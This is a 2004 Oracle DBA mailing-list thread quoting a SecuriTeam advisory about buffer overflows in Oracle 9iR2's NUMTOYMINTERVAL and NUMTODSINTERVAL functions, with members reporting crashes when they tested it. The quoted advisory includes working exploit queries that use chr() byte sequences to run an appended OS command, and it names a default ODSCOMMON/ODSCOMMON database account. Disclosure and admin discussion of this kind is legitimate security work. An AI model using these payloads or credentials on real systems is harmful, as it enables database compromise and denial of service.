Re: [NEWS] Oracle Database 9ir2 Interval Conversion Buffer Overflow
- From: mkb <mkb125@xxxxxxxxx>
- To: oracle-l@xxxxxxxxxxxxx
- Date: Thu, 26 Feb 2004 13:17:25 -0800 (PST)
Funnily enough, on 9.2.0.2 on HP-UX I get this:
illegal argument for function
and
desc NUMTOYMINTERVAL
object NUMTOYMINTERVAL does not exist
--- mkb <mkb125@xxxxxxxxx> wrote:
> Hmmmm.....
>
> Oracle 9.2.0.3 on Win2K, shutdown the instance and
> the
> Oracle service.
>
> Pretty serious bug to me.
>
> mohammed
>
> --- Jared.Still@xxxxxxxxxxx wrote:
> > Has anyone here heard of this?
> >
> > First I've seen it. Could not get the exploit to
> > work on 8i or 9i,
> > haven't tried 10g.
> >
> > It does however cause an ORA-3113.
> >
> > Jared
> >
> > =================================
> >
> > The following security advisory is sent to the
> > securiteam mailing list,
> > and can be found at the SecuriTeam web site:
> > http://www.securiteam.com
> > - - promotion
> >
> > The SecuriTeam alerts list - Free, Accurate,
> > Independent.
> >
> > Get your security news from a reliable source.
> > http://www.securiteam.com/mailinglist.html
> >
> >
> > - - - - - - - - -
> > Oracle Database 9ir2 Interval Conversion Buffer
> > Overflow
> > Oracle Database Server is one of the most used
> > database servers in the
> > world, it was marketed as being unbreakable and
> many
> > people thinks that is
> > one of the most secure database server in the
> > market.
> >
> > Oracle Database Server provides two functions that
> > can be used with PL/SQL
> > to convert numbers to date/time intervals, these
> > functions have buffer
> > overflow vulnerabilities.
> > Vulnerable Systems:
> > * Oracle Database version 9ir2 and prior
> >
> > When any of these conversion functions are called
> > with a long string as a
> > second parameter a buffer overflow occurs.
> >
> > To reproduce the overflow execute the next PL/SQL:
>
> > SELECT NUMTOYMINTERVAL(1,'longstringhere') from
> > dual;
> > SELECT NUMTODSINTERVAL(1,'longstringhere') from
> > dual;
> >
> > Any Oracle Database user can exploit this
> > vulnerability because access to
> > these functions can't be restricted. Exploitation
> of
> > this vulnerability
> > allow an attacker to execute arbitrary code, also
> it
> > can be exploited to
> > cause DOS (Denial of service) killing Oracle
> server
> > process. An attacker
> > can complete compromise the OS and database if
> > Oracle is running on
> > Windows platform, because Oracle must run under
> the
> > local System account
> > or under an administrative account. If Oracle is
> > running on *nix then only
> > the database could be compromised because Oracle
> > runs mostly under oracle
> > user which has restricted permissions.
> >
> > Important: Exploitation of these vulnerabilities
> > becomes easy if Oracle Internet
> > Directory has been deployed, because Oracle
> Internet
> > Directory creates a
> > database user called ODSCOMMON that has a default
> > password ODSCOMMON, this
> > password can not be changed, so any attacker can
> use
> > this user to connect
> > to database and exploit these vulnerabilities.
> >
> > Full tests on Oracle database 9ir2 under Microsoft
> > Windows 2000 Server and
> > Linux confirm these vulnerabilities. Versions
> > running in other OS
> > platforms are believed to be affected too.
> Previous
> > Oracle Database Server
> > versions could be affected by these
> vulnerabilities.
> >
> >
> > Exploits:
> > -- These exploits should work on Windows 2000
> Server
> > and Windows XP, not
> > tested on Windows 2003.
> > -- Run any command at the end of the string
> > SELECT
> >
>
NUMTOYMINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> > ||
> > chr(59) || chr(79) || chr(150) || chr(01) ||
> > chr(141) || chr(68) ||
> > chr(36) || chr(18) || chr(80) || chr(255) ||
> chr(21)
> > || chr(52) || chr(35)
> > || chr(148) || chr(01) || chr(255) || chr(37) ||
> > chr(172) || chr(33) ||
> > chr(148) || chr(01) || chr(32)||'echo ARE YOU
> SURE?
> > >c:\Unbreakable.txt')
> > ?FROM DUAL;
> >
> > SELECT
> >
>
NUMTODSINTERVAL(1,'AAAAAAAAAABBBBBBBBBBCCCCCCCCCCABCDEFGHIJKLMNOPQR'
> > ||
> > chr(59) || chr(79) || chr(150) || chr(01) ||
> > chr(141) || chr(68) ||
> > chr(36) || chr(18) || chr(80) || chr(255) ||
> chr(21)
> > || chr(52) || chr(35)
> > || chr(148) || chr(01) || chr(255) || chr(37) ||
> > chr(172) || chr(33) ||
> > chr(148) || chr(01) || chr(32) || 'echo ARE YOU
> > SURE?
> > >c:\Unbreakable.txt') ?
> >
> > FROM DUAL;
> >
> > Vendor Fix:
> > Go to Oracle Metalink site,
> > http://metalink.oracle.com.
> >
> > Vendor Contact:
> > Oracle was contacted and they released a fix
> without
> > telling the public
> > nor Ceaser anything and without issuing an alert.
> > Additional Information:
> > The information has been provided by Cesar.
> >
>
================================================================================
> >
> >
> >
> >
> >
> >
> > This bulletin is sent to members of the SecuriTeam
> > mailing list.
> > To unsubscribe from the list, send mail with an
> > empty subject line and
> > body to: html-list-unsubscribe@xxxxxxxxxxxxxx
> > In order to subscribe to the mailing list and
> > receive advisories in HTML
> > format, simply forward this email to:
> > html-list-subscribe@xxxxxxxxxxxxxx
> >
> >
>
================================================================================
> >
> >
> >
>
================================================================================
> >
> >
> > DISCLAIMER:
> > The information in this bulletin is provided "AS
> IS"
> > without warranty of
> > any kind.
> > In no event shall we be liable for any damages
> > whatsoever including
> > direct, indirect, incidental, consequential, loss
> of
> > business profits or
> > special damages.
> >
> >
> >
>
=== message truncated ===
__________________________________
Do you Yahoo!?
Get better spam protection with Yahoo! Mail.
http://antispam.yahoo.com/tools
----------------------------------------------------------------
Please see the official ORACLE-L FAQ: http://www.orafaq.com
----------------------------------------------------------------
To unsubscribe send email to: oracle-l-request@xxxxxxxxxxxxx
put 'unsubscribe' in the subject line.
--
Archives are at //www.freelists.org/archives/oracle-l/
FAQ is at //www.freelists.org/help/fom-serve/cache/1.html
-----------------------------------------------------------------
Other related posts:
